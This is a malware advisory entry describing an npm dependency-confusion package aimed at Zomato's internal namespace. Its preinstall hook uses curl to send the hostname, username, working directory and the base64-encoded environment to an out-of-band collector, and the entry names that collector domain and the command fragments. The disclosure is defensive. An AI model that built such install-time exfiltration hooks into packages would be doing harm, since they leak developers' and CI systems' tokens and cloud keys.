MAL-2026-6269

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (860464bbcd3d56375d93025e494e39a6652bb7d115fb581ee088474a66786c3d) Package is a dependency-confusion lure targeting Zomato's internal namespace. package.json declares a preinstall hook that runs curl on every `npm install`, posting the installer's hostname (`hostname -f`), username (`whoami`), current working directory, and the entire process environment (base64-encoded via `env | base64 -w0`) over plain HTTP to an interactsh out-of-band collector at d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site. The URL path embeds the package name and the form fields exfiltrate `host`, `user`, `cwd`, and `env`, so any CI/developer environment that misresolves Zomato's internal package name to this public release leaks AWS keys, GITHUB_TOKEN, NPM_TOKEN, and any other secrets exposed in the environment. A preuninstall hook performs a similar host beacon. The package's own functionality is a stub (`index.js` exports only `{name, version}`); its sole purpose is the install-time beacon. The description string self-identifies as `Zomato's PDF generator service`, confirming the dependency-confusion reconnaissance intent against Zomato's private namespace.